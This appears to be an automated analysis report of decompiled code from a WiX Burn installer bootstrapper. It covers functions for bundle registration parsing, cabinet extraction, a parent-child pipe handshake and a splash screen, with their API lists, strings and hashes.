                                                                                                                                                                  													if(_t143 < 0) {
                                                                                                                                                                  														_push("Failed to resize Addon code array in registration");
                                                                                                                                                                  														goto L32;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t124 =  *((intOrPtr*)(_t141 + 0x24));
                                                                                                                                                                  														 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x24)) +  *(_t141 + 0x28) * 4)) = _v8;
                                                                                                                                                                  														_v8 = _v8 & 0x00000000;
                                                                                                                                                                  														 *(_t141 + 0x28) =  *(_t141 + 0x28) + 1;
                                                                                                                                                                  														goto L22;
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t143 = E0043109A(_t141 + 0x1c, __eflags, _t141 + 0x1c,  *(_t141 + 0x20) + 1, 4, 5);
                                                                                                                                                                  												__eflags = _t143;
                                                                                                                                                                  												if(_t143 < 0) {
                                                                                                                                                                  													_push("Failed to resize Upgrade code array in registration");
                                                                                                                                                                  													goto L32;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t124 =  *((intOrPtr*)(_t141 + 0x1c));
                                                                                                                                                                  													 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x1c)) +  *(_t141 + 0x20) * 4)) = _v8;
                                                                                                                                                                  													_v8 = _v8 & 0x00000000;
                                                                                                                                                                  													 *(_t141 + 0x20) =  *(_t141 + 0x20) + 1;
                                                                                                                                                                  													goto L22;
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t143 = E0043109A(_t141 + 0x14, __eflags, _t141 + 0x14,  *(_t141 + 0x18) + 1, 4, 5);
                                                                                                                                                                  											__eflags = _t143;
                                                                                                                                                                  											if(_t143 < 0) {
                                                                                                                                                                  												_push("Failed to resize Detect code array in registration");
                                                                                                                                                                  												L32:
                                                                                                                                                                  												_push(_t143);
                                                                                                                                                                  												E00430A57();
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t124 =  *((intOrPtr*)(_t141 + 0x14));
                                                                                                                                                                  												 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x14)) +  *(_t141 + 0x18) * 4)) = _v8;
                                                                                                                                                                  												_v8 = _v8 & 0x00000000;
                                                                                                                                                                  												 *(_t141 + 0x18) =  *(_t141 + 0x18) + 1;
                                                                                                                                                                  												L22:
                                                                                                                                                                  												_t108 = _a8 + 1;
                                                                                                                                                                  												_a8 = _t108;
                                                                                                                                                                  												__eflags = _t108 - _v24;
                                                                                                                                                                  												if(_t108 < _v24) {
                                                                                                                                                                  													continue;
                                                                                                                                                                  												} else {
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L34;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to get next RelatedBundle element.");
                                                                                                                                                                  							goto L32;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to get RelatedBundle element count.");
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to get RelatedBundle nodes");
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_push(_t143);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				L34:
                                                                                                                                                                  				_t125 = _v16;
                                                                                                                                                                  				if(_t125 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t125 + 8))(_t125);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t126 = _v20;
                                                                                                                                                                  				if(_t126 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t143;
                                                                                                                                                                  			}














                                                                                                                                                                  0x00409ba0
                                                                                                                                                                  0x00409bb2
                                                                                                                                                                  0x00409bb4
                                                                                                                                                                  0x00409bb6
                                                                                                                                                                  0x00409c2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409bb8
                                                                                                                                                                  0x00409bbb
                                                                                                                                                                  0x00409bc1
                                                                                                                                                                  0x00409bc4
                                                                                                                                                                  0x00409bc8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409bc8
                                                                                                                                                                  0x00409bb6
                                                                                                                                                                  0x00409b56
                                                                                                                                                                  0x00409b68
                                                                                                                                                                  0x00409b6a
                                                                                                                                                                  0x00409b6c
                                                                                                                                                                  0x00409c27
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409b72
                                                                                                                                                                  0x00409b75
                                                                                                                                                                  0x00409b7b
                                                                                                                                                                  0x00409b7e
                                                                                                                                                                  0x00409b82
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409b82
                                                                                                                                                                  0x00409b6c
                                                                                                                                                                  0x00409b0c
                                                                                                                                                                  0x00409b1e
                                                                                                                                                                  0x00409b20
                                                                                                                                                                  0x00409b22
                                                                                                                                                                  0x00409c20
                                                                                                                                                                  0x00409c67
                                                                                                                                                                  0x00409c67
                                                                                                                                                                  0x00409c68
                                                                                                                                                                  0x00409b28
                                                                                                                                                                  0x00409b2b
                                                                                                                                                                  0x00409b31
                                                                                                                                                                  0x00409b34
                                                                                                                                                                  0x00409b38
                                                                                                                                                                  0x00409c0e
                                                                                                                                                                  0x00409c11
                                                                                                                                                                  0x00409c12
                                                                                                                                                                  0x00409c15
                                                                                                                                                                  0x00409c18
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c1e
                                                                                                                                                                  0x00409c18
                                                                                                                                                                  0x00409b22
                                                                                                                                                                  0x00409b0a
                                                                                                                                                                  0x00409aee
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c6f
                                                                                                                                                                  0x00409c62
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409c62
                                                                                                                                                                  0x00409a7e
                                                                                                                                                                  0x00409a7e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409a7e
                                                                                                                                                                  0x00409a64
                                                                                                                                                                  0x00409a64
                                                                                                                                                                  0x00409a83
                                                                                                                                                                  0x00409a83
                                                                                                                                                                  0x00409a84
                                                                                                                                                                  0x00409a8a
                                                                                                                                                                  0x00409c70
                                                                                                                                                                  0x00409c70
                                                                                                                                                                  0x00409c75
                                                                                                                                                                  0x00409c7a
                                                                                                                                                                  0x00409c7a
                                                                                                                                                                  0x00409c7d
                                                                                                                                                                  0x00409c82
                                                                                                                                                                  0x00409c87
                                                                                                                                                                  0x00409c87
                                                                                                                                                                  0x00409c8e
                                                                                                                                                                  0x00409c93
                                                                                                                                                                  0x00409c93
                                                                                                                                                                  0x00409c9c
                                                                                                                                                                  0x00409ca1
                                                                                                                                                                  0x00409ca1
                                                                                                                                                                  0x00409cab

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00435B5E: VariantInit.OLEAUT32(?), ref: 00435B74
                                                                                                                                                                    • Part of subcall function 00435B5E: SysAllocString.OLEAUT32(?), ref: 00435B90
                                                                                                                                                                    • Part of subcall function 00435B5E: VariantClear.OLEAUT32(?), ref: 00435C17
                                                                                                                                                                    • Part of subcall function 00435B5E: SysFreeString.OLEAUT32(00000000), ref: 00435C22
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Detect,000000FF,?,0043C524,?,?,Action,?,?,?,00000000,?), ref: 00409B05
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF,?,?,00000000), ref: 00409B4F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get RelatedBundle element count., xrefs: 00409A7E
                                                                                                                                                                  • RelatedBundle, xrefs: 00409A42
                                                                                                                                                                  • Failed to get RelatedBundle nodes, xrefs: 00409A64
                                                                                                                                                                  • Failed to get next RelatedBundle element., xrefs: 00409C62
                                                                                                                                                                  • Failed to resize Detect code array in registration, xrefs: 00409C20
                                                                                                                                                                  • Invalid value for @Action: %ls, xrefs: 00409C44
                                                                                                                                                                  • Failed to get @Id., xrefs: 00409C54
                                                                                                                                                                  • Detect, xrefs: 00409AF6
                                                                                                                                                                  • Patch, xrefs: 00409BCF
                                                                                                                                                                  • Failed to resize Upgrade code array in registration, xrefs: 00409C27
                                                                                                                                                                  • Failed to resize Patch code array in registration, xrefs: 00409C35
                                                                                                                                                                  • Addon, xrefs: 00409B8C
                                                                                                                                                                  • Failed to get @Action., xrefs: 00409C5B
                                                                                                                                                                  • Upgrade, xrefs: 00409B42
                                                                                                                                                                  • Action, xrefs: 00409AC2
                                                                                                                                                                  • Failed to resize Addon code array in registration, xrefs: 00409C2E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade
                                                                                                                                                                  • API String ID: 702752599-3660206225
                                                                                                                                                                  • Opcode ID: 289cd5b7f1ff4c2898b8f825eccadd8a80f5ca70ea8fab27eb773d131c107424
                                                                                                                                                                  • Instruction ID: 31795237cbe3677980191db509f1c8e62019c186d671a697189a7d8daed1bced
                                                                                                                                                                  • Opcode Fuzzy Hash: 289cd5b7f1ff4c2898b8f825eccadd8a80f5ca70ea8fab27eb773d131c107424
                                                                                                                                                                  • Instruction Fuzzy Hash: 3971A471D44616BBE714DBA0C941EAEB7B4FF04724F20466AEA21B72C1C738ED51CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 00423ABE
                                                                                                                                                                  • #20.CABINET(Function_000231FF,Function_00023254,Function_000232A4,Function_000233C9,Function_00023563,Function_0002320E,Function_0002345D,000000FF,?), ref: 00423B1A
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00423D2A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                  • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                  • API String ID: 3442037557-1168358783
                                                                                                                                                                  • Opcode ID: a7e705f6690e14aa345b0b92adff1ea33db04935cacdb157d4933bf4f9833bc3
                                                                                                                                                                  • Instruction ID: c16b7eedfca3f7780ced09ad6c93490718ec9e693c51b8ba4c83565c4ceff0aa
                                                                                                                                                                  • Opcode Fuzzy Hash: a7e705f6690e14aa345b0b92adff1ea33db04935cacdb157d4933bf4f9833bc3
                                                                                                                                                                  • Instruction Fuzzy Hash: CB514B37F50231A7DB209E66BC05B6B76709B04B22FA24267FD01BB281D66DCE0195ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E0040EB2E(void* _a4, short* _a8, intOrPtr* _a12) {
                                                                                                                                                                  				struct _OVERLAPPED* _v8;
                                                                                                                                                                  				void _v12;
                                                                                                                                                                  				long _v16;
                                                                                                                                                                  				void _v20;
                                                                                                                                                                  				long _v24;
                                                                                                                                                                  				void _v28;
                                                                                                                                                                  				long _t26;
                                                                                                                                                                  				intOrPtr _t41;
                                                                                                                                                                  				intOrPtr* _t66;
                                                                                                                                                                  				void* _t69;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_t26 = GetCurrentProcessId();
                                                                                                                                                                  				_t69 = _a4;
                                                                                                                                                                  				_v28 = _t26;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				if(ReadFile(_t69,  &_v12, 4,  &_v16, 0) != 0) {
                                                                                                                                                                  					_t31 = _v12 >> 1;
                                                                                                                                                                  					if(_v12 >> 1 <= 0xff) {
                                                                                                                                                                  						_t71 = E00433BDF( &_v8, _t31 + 1);
                                                                                                                                                                  						if(_t71 >= 0) {
                                                                                                                                                                  							if(ReadFile(_t69, _v8, _v12,  &_v16, 0) != 0) {
                                                                                                                                                                  								if(CompareStringW(0, 0, _v8, 0xffffffff, _a8, 0xffffffff) == 2) {
                                                                                                                                                                  									if(ReadFile(_t69,  &_v20, 4,  &_v16, 0) != 0) {
                                                                                                                                                                  										_t66 = _a12;
                                                                                                                                                                  										_t41 =  *_t66;
                                                                                                                                                                  										if(_t41 != 0) {
                                                                                                                                                                  											if(_t41 == _v20) {
                                                                                                                                                                  												goto L15;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t70 = 0x8007000d;
                                                                                                                                                                  												_t71 = 0x8007000d;
                                                                                                                                                                  												E004300D9(_t41, "pipe.cpp", 0x375, 0x8007000d);
                                                                                                                                                                  												_push("Verification process id from parent does not match.");
                                                                                                                                                                  												goto L4;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											 *_t66 = _v20;
                                                                                                                                                                  											L15:
                                                                                                                                                                  											if(WriteFile(_t69,  &_v28, 4,  &_v24, 0) == 0) {
                                                                                                                                                                  												_t74 =  <=  ? GetLastError() : _t47 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t47 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												E004300D9(0x80004005, "pipe.cpp", 0x37b, _t71);
                                                                                                                                                                  												_push("Failed to inform parent process that child is running.");
                                                                                                                                                                  												goto L17;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t77 =  <=  ? GetLastError() : _t53 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t53 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										E004300D9(0x80004005, "pipe.cpp", 0x36a, _t71);
                                                                                                                                                                  										_push("Failed to read verification process id from parent pipe.");
                                                                                                                                                                  										goto L17;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t70 = 0x8007000d;
                                                                                                                                                                  									_t71 = 0x8007000d;
                                                                                                                                                                  									E004300D9(_t37, "pipe.cpp", 0x364, 0x8007000d);
                                                                                                                                                                  									_push("Verification secret from parent does not match.");
                                                                                                                                                                  									goto L4;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t80 =  <=  ? GetLastError() : _t57 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t57 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								E004300D9(0x80004005, "pipe.cpp", 0x35d, _t71);
                                                                                                                                                                  								_push("Failed to read verification secret from parent pipe.");
                                                                                                                                                                  								goto L17;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Failed to allocate buffer for verification secret.");
                                                                                                                                                                  							goto L17;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t70 = 0x8007000d;
                                                                                                                                                                  						_t71 = 0x8007000d;
                                                                                                                                                                  						E004300D9(_t31, "pipe.cpp", 0x355, 0x8007000d);
                                                                                                                                                                  						_push("Verification secret from parent is too big.");
                                                                                                                                                                  						L4:
                                                                                                                                                                  						_push(_t70);
                                                                                                                                                                  						goto L18;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t83 =  <=  ? GetLastError() : _t61 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t61 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "pipe.cpp", 0x34f, _t71);
                                                                                                                                                                  					_push("Failed to read size of verification secret from parent pipe.");
                                                                                                                                                                  					L17:
                                                                                                                                                                  					_push(_t71);
                                                                                                                                                                  					L18:
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t71;
                                                                                                                                                                  			}















                                                                                                                                                                  0x0040ed1e
                                                                                                                                                                  0x0040ed23
                                                                                                                                                                  0x0040ed23
                                                                                                                                                                  0x0040ed2e

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,8000FFFF,00000008,?,0040F03F,?,?,00000008,00000000,?), ref: 0040EB45
                                                                                                                                                                  • ReadFile.KERNEL32(00000008,00000008,00000004,?,00000000,?,0040F03F,?,?,00000008,00000000,?), ref: 0040EB66
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040F03F,?,?,00000008,00000000,?), ref: 0040EB6C
                                                                                                                                                                  • WriteFile.KERNEL32(00000008,?,00000004,0040F03F,00000000,?,0040F03F,?,?,00000008,00000000,?), ref: 0040ECD5
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040F03F,?,?,00000008,00000000,?), ref: 0040ECDF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to read verification process id from parent pipe., xrefs: 0040ECB3
                                                                                                                                                                  • Failed to allocate buffer for verification secret., xrefs: 0040EBE3
                                                                                                                                                                  • Verification secret from parent is too big., xrefs: 0040EBC7
                                                                                                                                                                  • Failed to read verification secret from parent pipe., xrefs: 0040EC2E
                                                                                                                                                                  • Verification secret from parent does not match., xrefs: 0040EC68
                                                                                                                                                                  • Failed to inform parent process that child is running., xrefs: 0040ED0D
                                                                                                                                                                  • Verification process id from parent does not match., xrefs: 0040ED4D
                                                                                                                                                                  • Failed to read size of verification secret from parent pipe., xrefs: 0040EB9A
                                                                                                                                                                  • pipe.cpp, xrefs: 0040EB90, 0040EBBB, 0040EC24, 0040EC5C, 0040ECA9, 0040ED03, 0040ED41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CurrentProcessReadWrite
                                                                                                                                                                  • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$pipe.cpp
                                                                                                                                                                  • API String ID: 3008747291-826945260
                                                                                                                                                                  • Opcode ID: cadf8cff6aef706ef333a32dadecbea014cf4671b927aac3acbb476274c379d5
                                                                                                                                                                  • Instruction ID: 1f9773c724c563c647fa8bfceb3ca0dba960811952104bebcbe29d703853f5a2
                                                                                                                                                                  • Opcode Fuzzy Hash: cadf8cff6aef706ef333a32dadecbea014cf4671b927aac3acbb476274c379d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 9751D572A40215BBE7219AA68C45FAF76B8EF04B11F21023BFE01F71D0D6799D0096ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E004171DA(void* __eflags, void** _a4) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				void _v24;
                                                                                                                                                                  				struct tagMSG _v52;
                                                                                                                                                                  				struct _WNDCLASSW _v92;
                                                                                                                                                                  				int _t47;
                                                                                                                                                                  				signed short _t58;
                                                                                                                                                                  				signed short _t61;
                                                                                                                                                                  				struct HWND__* _t67;
                                                                                                                                                                  				signed int _t69;
                                                                                                                                                                  				void** _t82;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t69 = 0xa;
                                                                                                                                                                  				_push(7);
                                                                                                                                                                  				memset( &_v52, memset( &_v92, 0, _t69 << 2), 0 << 2);
                                                                                                                                                                  				_t82 = _a4;
                                                                                                                                                                  				_t83 = E004170C3(_t82[1],  &_v24);
                                                                                                                                                                  				if(_t83 >= 0) {
                                                                                                                                                                  					_v92.lpfnWndProc = E0041737C;
                                                                                                                                                                  					_v92.hInstance = _t82[1];
                                                                                                                                                                  					_v92.hCursor = LoadCursorW(0, 0x7f00);
                                                                                                                                                                  					_v92.lpszClassName = L"WixBurnSplashScreen";
                                                                                                                                                                  					if(RegisterClassW( &_v92) != 0) {
                                                                                                                                                                  						_t22 =  &(_v92.lpszClassName); // 0x447aec
                                                                                                                                                                  						_t67 = CreateWindowExW(0x80,  *_t22, _t82[2], 0x90000000, _v20, _v16, _v12, _v8, 0, 0, _t82[1],  &_v24);
                                                                                                                                                                  						if(_t67 != 0) {
                                                                                                                                                                  							 *(_t82[3]) = _t67;
                                                                                                                                                                  							SetEvent( *_t82);
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								_t47 = GetMessageW( &_v52, 0, 0, 0);
                                                                                                                                                                  								if(_t47 == 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_t47 == 0xffffffff) {
                                                                                                                                                                  									_t83 = 0x8000ffff;
                                                                                                                                                                  									_push("Unexpected return value from message pump.");
                                                                                                                                                                  									L13:
                                                                                                                                                                  									_push(_t83);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  									L14:
                                                                                                                                                                  									L15:
                                                                                                                                                                  									UnregisterClassW(L"WixBurnSplashScreen", _t82[1]);
                                                                                                                                                                  									if(_v24 != 0) {
                                                                                                                                                                  										DeleteObject(_v24);
                                                                                                                                                                  									}
                                                                                                                                                                  									return _t83;
                                                                                                                                                                  								}
                                                                                                                                                                  								if(IsDialogMessageW(_t67,  &_v52) == 0) {
                                                                                                                                                                  									TranslateMessage( &_v52);
                                                                                                                                                                  									DispatchMessageW( &_v52);
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L14;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t58 = GetLastError();
                                                                                                                                                                  						_t86 =  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t83 =  >=  ? 0x80004005 :  <=  ? _t58 : _t58 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "splashscreen.cpp", 0x96, _t83);
                                                                                                                                                                  						_push("Failed to create window.");
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t61 = GetLastError();
                                                                                                                                                                  					_t89 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t83 =  >=  ? 0x80004005 :  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "splashscreen.cpp", 0x90, _t83);
                                                                                                                                                                  					_push("Failed to register window.");
                                                                                                                                                                  					goto L13;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("Failed to load splash screen.");
                                                                                                                                                                  				_push(_t83);
                                                                                                                                                                  				E00430A57();
                                                                                                                                                                  				goto L15;
                                                                                                                                                                  			}

















                                                                                                                                                                  0x00417329
                                                                                                                                                                  0x00417329
                                                                                                                                                                  0x00417319
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00417342
                                                                                                                                                                  0x004172c3
                                                                                                                                                                  0x004172d4
                                                                                                                                                                  0x004172de
                                                                                                                                                                  0x004172ec
                                                                                                                                                                  0x004172f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004172f1
                                                                                                                                                                  0x0041725a
                                                                                                                                                                  0x0041726b
                                                                                                                                                                  0x00417275
                                                                                                                                                                  0x00417283
                                                                                                                                                                  0x00417288
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00417288
                                                                                                                                                                  0x00417213
                                                                                                                                                                  0x00417218
                                                                                                                                                                  0x00417219
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004170C3: LoadBitmapW.USER32 ref: 004170F9
                                                                                                                                                                    • Part of subcall function 004170C3: GetLastError.KERNEL32 ref: 00417105
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0041723B
                                                                                                                                                                  • RegisterClassW.USER32 ref: 0041724F
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041725A
                                                                                                                                                                  • UnregisterClassW.USER32 ref: 0041735F
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041736E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                                                  • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp$zD
                                                                                                                                                                  • API String ID: 164797020-2755939580
                                                                                                                                                                  • Opcode ID: d1b424e59f646d17b76b112b74011394bdea5906f545a14c3f376848e9a4f4e0
                                                                                                                                                                  • Instruction ID: 4d55ffa0e84129185a4d000a32cb2512c94fcd1dd4a5a8dca163c788eec9446b
                                                                                                                                                                  • Opcode Fuzzy Hash: d1b424e59f646d17b76b112b74011394bdea5906f545a14c3f376848e9a4f4e0
                                                                                                                                                                  • Instruction Fuzzy Hash: 20419072904219BFEB119BA4DC49FEEB7B8FF08304F100126FE15E6150D7359901DBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E004120C1(void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				intOrPtr _v24;
